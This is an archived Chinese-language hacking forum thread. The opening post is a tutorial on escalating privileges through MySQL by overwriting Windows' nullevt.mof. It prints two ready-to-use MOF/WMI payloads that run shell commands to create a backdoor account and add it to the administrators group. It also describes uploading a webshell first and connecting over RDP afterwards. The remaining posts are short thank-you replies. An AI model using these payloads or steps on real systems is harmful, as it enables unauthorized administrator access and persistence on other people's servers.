Select Browser Mobile | Continue

Silic Group Froum Archive - Silic Security

 Forgot Password?
 Join Us
Search
Show: 5339|Reply: 123

[原创] 【MYSQL提权】Mysql扩展文件MOF提权详讲

    [Copy URL]
Tony The user has been deleted
Posted 2016-2-23 14:53:06 | Show all replies |Read Mode
【题记】今天拿破飞机加我好友,说我写的mof提权思路不错,但不够详细,现在写一篇详细的mof提权方法

【原理】在c:/windows/system32/wbem/mof/目录下的nullevt.mof每分钟都会有一个特定的时间去执行一次(由"And TargetInstance.Second = 5";控制,这里输入5就是每分钟的第五秒执行。一会mof文件我会分享的。),那么把cmd命令添加到nullevt.mof中,cmd命令就会自动执行了。

【前提】有mysql的root密码。
这里我是本地搭建的环境进行演示的。
自己先扔上去一个大马。
然后上传我们提前准备好的,含有添加用户命令的mof上传到服务器。
==================MOF添加用户代码==================


#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{EventNamespace = "Root\\Cimv2";Name = "filtP2";Query = "Select * From __InstanceModificationEvent ""Where TargetInstance Isa \"Win32_LocalTime\" ""And TargetInstance.Second = 5";QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{Name = "consPCSV2";ScriptingEngine = "JScript";ScriptText ="var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user adminatony adminatony /add\")";};instance of __FilterToConsumerBinding{Consumer = $Consumer;Filter = $EventFilter;};
mof被执行的话,会帮我们添加一个叫admintony的用户。
上传。
好了, 在替换c:/windows/system32/wbem/mof/目录下的nullevt.mof之前,我们先看一下系统有没有admintony用户,如下:
接下来我们用sql命令将上传的mof移动到c:/windows/system32/wbem/mof/目录下替换nullevt.mof
替换了,稍微等一下看看有没admintony的用户添加上去。
可以了,添加了用户,但admintony用户还不是administrators组,我们再上传一个mof将它加到administrators组。

==================MOF加管理组代码=================
#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{EventNamespace = "Root\\Cimv2";Name = "filtP2";Query = "Select * From __InstanceModificationEvent ""Where TargetInstance Isa \"Win32_LocalTime\" ""And TargetInstance.Second = 5";QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{Name = "consPCSV2";ScriptingEngine = "JScript";ScriptText ="var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe localgroup administrators admintony /add\")";};instance of __FilterToConsumerBinding{Consumer = $Consumer;Filter = $EventFilter;};

再将addadmingroup.mof移动到c:/windows/system32/wbem/mof/nullevt.mof
稍等片刻,3389链接之。



harkie The user has been deleted
Posted 2016-2-23 17:21:16 | Show all replies
本帖最后由 harkie 于 2016-2-23 17:24 编辑

                  加个好友
suy The user has been deleted
Posted 2016-2-23 17:33:22 | Show all replies
看看撸主姿势淫不淫荡
枫叶 The user has been deleted
Posted 2016-2-23 18:01:31 | Show all replies
你们两个人这是咋了
Moriarty The user has been deleted
Posted 2016-2-23 18:05:18 | Show all replies
无情
刺刀 The user has been deleted
Posted 2016-2-23 18:31:32 | Show all replies
回帖是美德
annabelle The user has been deleted
Posted 2016-2-23 18:34:26 | Show all replies
接地气 The user has been deleted
Posted 2016-2-23 19:11:28 | Show all replies
前来支持。
jiangsir The user has been deleted
Posted 2016-2-23 19:47:22 | Show all replies
围观。。。。。。。。
ziii The user has been deleted
Posted 2016-2-23 20:10:47 | Show all replies
飞机大侠         
JJ-Fly The user has been deleted
Posted 2016-2-23 20:14:50 | Show all replies
看看 谢谢                              
qq87956943 The user has been deleted
Posted 2016-2-23 21:05:05 | Show all replies
进来学习学习姿势
wangbadang The user has been deleted
Posted 2016-2-23 21:34:23 | Show all replies
谢谢学习一下把
Tony The user has been deleted
 Author| Posted 2016-2-23 21:39:00 | Show all replies
枫叶 发表于 2016-2-23 18:01
你们两个人这是咋了

把文章搬过来吧
Tony The user has been deleted
 Author| Posted 2016-2-23 21:39:41 | Show all replies

谢前辈,没有一楼一楼写,飞币没你多。
Dream° The user has been deleted
Posted 2016-2-23 23:01:28 | Show all replies
这个不错哦·
four The user has been deleted
Posted 2016-2-23 23:29:45 | Show all replies
看看啦 学习姿势
cherishu The user has been deleted
Posted 2016-2-24 08:41:24 | Show all replies
谢谢分享                       
Scorpion The user has been deleted
Posted 2016-2-24 09:00:11 | Show all replies
芝麻开门,爆内容
MaxAeon The user has been deleted
Posted 2016-2-24 11:44:04 | Show all replies
看看里面有什么
You need to login before reply! Login | Join Us

Credit Rules of This Forum

Close

公告Privious /1 Next

小黑屋|手机版|Archiver|Silic Security

GMT+8, 2017-2-27 16:56

© 2001-2014 Silic Corp.

Quick Reply Top Return List